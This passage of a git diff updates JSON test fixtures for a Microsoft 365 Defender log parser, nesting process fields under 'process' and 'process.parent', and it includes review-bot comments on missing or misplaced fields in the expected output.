domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT 
DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe 
/V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - 
Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}",
+ "event": {
+ "category": [
+ "file"
+ ],
+ "dataset": "device_file_events",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-11-08T14:38:51.904876Z",
+ "action": {
+ "properties": {
+ "RequestAccountSid": "S-1-2-3",
+ "process": {
+ "CommandLine": "commandexec.exe /V",
+ "FileSize": 176128,
+ "IntegrityLevel": "System",
+ "TokenElevation": "TokenElevationTypeDefault",
+ "VersionInfoCompanyName": "Microsoft Corporation",
+ "VersionInfoFileDescription": "Windows\u00ae installer",
+ "VersionInfoInternalFileName": "commandexec",
+ "VersionInfoOriginalFileName": "commandexec.exe",
+ "VersionInfoProductName": "Windows Installer - Unicode",
+ "VersionInfoProductVersion": "5.0.22621.3880"
+ }
+ },
+ "type": "FileCreated"
+ },
+ "file": {
+ "directory": "C:\\Program Files\\FileName.dll",
+ "hash": {
+ "md5": "9a3af3a9ce0217bccce1d161e0b6bfde",
+ "sha1": "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264",
+ "sha256": "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595"
+ },
+ "name": "FileName.dll",
+ "size": 640920
+ },
+ "host": {
+ "id": "123456789abcdef",
+ "name": "device.company.local"
+ },
+ "microsoft": {
+ "defender": {
+ "report": {
+ "id": "341972"
+ }
+ }
+ },
+ "network": {
+ "protocol": "Local"
+ },
+ "process": {
+ "args": [
+ "/V"
+ ],
+ "command_line": "commandexec.exe /V",
+ "executable": "c:\\windows\\system32\\commandexec.exe",
+ "hash": {
+ "md5": "51a9cac9c4e8da44ffd7502be17604ee",
+ "sha1": 
"44543e0c6f30415c670c1322e61ca68602d58708",
+ "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
+ },
+ "name": "commandexec.exe",
+ "parent": {
+ "name": "services.exe",
+ "pid": 888,
+ "start": "2024-10-09T01:02:27.222708Z"
+ },
+ "pid": 16468,
+ "start": "2024-11-08T14:38:23.238308Z",
+ "user": {
+ "domain": "account domain",
+ "id": "S-1-2-3",
+ "name": "syst\u00e8me"
+ },
+ "working_directory": "c:\\windows\\system32"
+ },
+ "related": {
+ "hash": [
+ "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595",
+ "44543e0c6f30415c670c1322e61ca68602d58708",
+ "51a9cac9c4e8da44ffd7502be17604ee",
+ "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323",
+ "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264",
+ "9a3af3a9ce0217bccce1d161e0b6bfde"
+ ],
+ "user": [
+ "Syst\u00e8me"
+ ]
+ },
+ "user": {
+ "domain": "ACCOUNT DOMAIN",
+ "name": "Syst\u00e8me"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json
index 497faa7bf..04559806a 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json
@@ -16,10 +16,12 @@
 "@timestamp": "2022-09-01T07:47:58.616127Z",
 "action": {
 "properties": {
- "InitiatingProcessCommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"",
- "InitiatingProcessFileSize": 66560,
- "InitiatingProcessIntegrityLevel": "Medium",
- "InitiatingProcessTokenElevation": "TokenElevationTypeDefault"
+ "process": {
+ "CommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"",
+ "FileSize": 66560,
+ "IntegrityLevel": "Medium",
+ "TokenElevation": "TokenElevationTypeDefault"
+ }
 },
 "type": "ImageLoaded"
 },
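Review bot: `file.directory` is pinned to `C:\\Program Files\\FileName.dll`, i.e. `FolderPath` verbatim including the file name, while the ShellLinkCreateFileEvent fixture added in this same commit expects a real folder there; ECS `file.directory` is the parent directory, so rules that match on it will silently miss this event. When `FolderPath` ends with `FileName` the expectation should be `"directory": "C:\\Program Files"` with the full path under `file.path` — or, if this is an upstream DeviceFileEvents quirk the parser deliberately preserves, the test name or a comment-bearing sibling fixture should say so rather than freeze it unexplained. The SID that would make the actor correlatable, `RequestAccountSid: "S-1-2-3"`, survives only under `action.properties`; `user.name`/`user.domain` are filled from `RequestAccountName`/`RequestAccountDomain`, so `"user": { "id": "S-1-2-3", ... }` should be pinned alongside them. The parser is not in this diff; both points are inferred from the expected document.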
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json
index 15dc7a41b..e70edf395 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json
@@ -17,9 +17,11 @@
 "action": {
 "properties": {
 "AccountSid": "S-1-1-11-1-1",
- "InitiatingProcessCommandLine": "WinLogon.exe -SpecialSession",
 "LogonId": "111111",
- "LogonType": "Interactive"
+ "LogonType": "Interactive",
+ "process": {
+ "CommandLine": "WinLogon.exe -SpecialSession"
+ }
 },
 "type": "LogonSuccess"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json
index 348f76f4e..75ab306b8 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json
@@ -16,19 +16,21 @@
 "@timestamp": "2023-01-04T14:05:32.314862Z",
 "action": {
 "properties": {
- "InitiatingProcessAccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614",
- "InitiatingProcessCommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx",
- "InitiatingProcessFileSize": 63984520,
- "InitiatingProcessIntegrityLevel": "Medium",
- "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
- "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
- "InitiatingProcessVersionInfoFileDescription": "Microsoft Excel",
- "InitiatingProcessVersionInfoInternalFileName": "Excel",
- "InitiatingProcessVersionInfoOriginalFileName": "Excel.exe",
- "InitiatingProcessVersionInfoProductName": "Microsoft Office",
- "InitiatingProcessVersionInfoProductVersion": "16.0.15601.20538",
 "LocalIPType": "Private",
- "RemoteIPType": "Public"
+ "RemoteIPType": "Public",
+ "process": {
+ "AccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614",
+ "CommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx",
+ "FileSize": 63984520,
+ "IntegrityLevel": "Medium",
+ "TokenElevation": "TokenElevationTypeDefault",
+ "VersionInfoCompanyName": "Microsoft Corporation",
+ "VersionInfoFileDescription": "Microsoft Excel",
+ "VersionInfoInternalFileName": "Excel",
+ "VersionInfoOriginalFileName": "Excel.exe",
+ "VersionInfoProductName": "Microsoft Office",
+ "VersionInfoProductVersion": "16.0.15601.20538"
+ }
 },
 "type": "ConnectionSuccess"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json
index cd2ca7981..7acf31f01 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json
@@ -29,9 +29,11 @@
 }
 },
 "process": {
- "user": {
- "domain": "autorite nt",
- "name": "syst\u00e8me"
+ "parent": {
+ "user": {
+ "domain": "autorite nt",
+ "name": "syst\u00e8me"
+ }
 }
 }
 }
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
index 7d72e6264..3847a138b 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
@@ -17,25 +17,30 @@
 "action": {
 "properties": {
 "AccountSid": "S-1-1-11",
- "InitiatingProcessCommandLine": "\"MsMpEng.exe\"",
- "InitiatingProcessFileSize": 133576,
- "InitiatingProcessIntegrityLevel": "System",
- "InitiatingProcessLogonId": "999",
- "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
- "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
- "InitiatingProcessVersionInfoFileDescription": "Antimalware Service Executable",
- "InitiatingProcessVersionInfoInternalFileName": "MsMpEng.exe",
- "InitiatingProcessVersionInfoOriginalFileName": "MsMpEng.exe",
- "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
- "InitiatingProcessVersionInfoProductVersion": "4.18.2301.6",
 "LogonId": "999",
- "ProcessIntegrityLevel": "System",
- "ProcessVersionInfoCompanyName": "Microsoft Corporation",
- "ProcessVersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility",
- "ProcessVersionInfoInternalFileName": "MpCmdRun",
- "ProcessVersionInfoOriginalFileName": "MpCmdRun.exe",
- "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
- "ProcessVersionInfoProductVersion": "4.18.2301.6"
+ "process": {
+ "IntegrityLevel": "System",
+ "TokenElevation": "TokenElevationTypeDefault",
+ "VersionInfoCompanyName": "Microsoft Corporation",
+ "VersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility",
+ "VersionInfoInternalFileName": "MpCmdRun",
+ "VersionInfoOriginalFileName": "MpCmdRun.exe",
+ "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+ "VersionInfoProductVersion": "4.18.2301.6",
+ "parent": {
+ "CommandLine": "\"MsMpEng.exe\"",
+ "FileSize": 133576,
+ "IntegrityLevel": "System",
+ "LogonId": "999",
+ "TokenElevation": "TokenElevationTypeDefault",
+ "VersionInfoCompanyName": "Microsoft Corporation",
+ "VersionInfoFileDescription": "Antimalware Service Executable",
+ "VersionInfoInternalFileName": "MsMpEng.exe",
+ 
"VersionInfoOriginalFileName": "MsMpEng.exe",
+ "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+ "VersionInfoProductVersion": "4.18.2301.6"
+ }
+ }
 },
 "type": "ProcessCreated"
 },
@@ -69,31 +74,33 @@
 "54",
 "Scan"
 ],
- "code_signature": {
- "status": "Valid",
- "subject_name": "OsVendor"
- },
 "command_line": "\"MpCmdRun.exe\" Scan -ScheduleJob -RestrictPrivileges -DailyScan -ScanTrigger 54",
- "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe",
- "hash": {
- "md5": "5d5608654828cf052ba013b3c37cbb61",
- "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae",
- "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e"
- },
- "name": "MsMpEng.exe",
+ "name": "MpCmdRun.exe",
 "parent": {
- "name": "services.exe",
- "pid": 1032,
- "start": "2023-01-03T08:51:26.740241Z"
+ "code_signature": {
+ "status": "Valid",
+ "subject_name": "OsVendor"
+ },
+ "command_line": "\"MsMpEng.exe\"",
+ "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe",
+ "hash": {
+ "md5": "5d5608654828cf052ba013b3c37cbb61",
+ "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae",
+ "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e"
+ },
+ "name": "MsMpEng.exe",
+ "pid": 5456,
+ "start": "2023-01-03T08:51:29.269279Z",
+ "user": {
+ "domain": "NT",
+ "id": "S-1-1-11",
+ "name": "System"
+ },
+ "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0"
 },
 "pid": 37788,
 "start": "2023-01-04T14:15:10.355033Z",
- "user": {
- "domain": "NT",
- "id": "S-1-1-11",
- "name": "System"
- },
- "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0"
+ "working_directory": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2301.6-0"
 },
 "related": {
 "hash": [
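Review bot: After the re-attribution the child `MpCmdRun.exe` keeps `command_line`, `name`, `pid`, `start` and `working_directory` but no longer has any `process.executable`, `process.hash` or `process.user` — those keys moved to `process.parent` together with the MsMpEng.exe values and nothing replaces them on the child — even though `action.properties.AccountSid`/`LogonId` (`S-1-1-11`, `999`) in the first hunk belong to the created process. Its new `working_directory` (`C:\\ProgramData\\...\\4.18.2301.6-0`) implies the input carries a child `FolderPath`, so the fixture should pin `"executable": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2301.6-0\\MpCmdRun.exe"`, the child's own `hash` if `SHA1`/`SHA256` are present, and `"user": { "id": "S-1-1-11" }`; otherwise process-level detections see the parent binary only. The `related.hash` list that follows is cut off here and should be checked for the same drop; the input message is outside this hunk, so the exact path and hashes need confirming against it.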
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
index d2e83b32a..cac1e9791 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
@@ -1,9 +1,15 @@ { "input": { - "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, 
\"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, 
\"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}" + "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming 
traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating 
System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } }, "expected": { - "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, 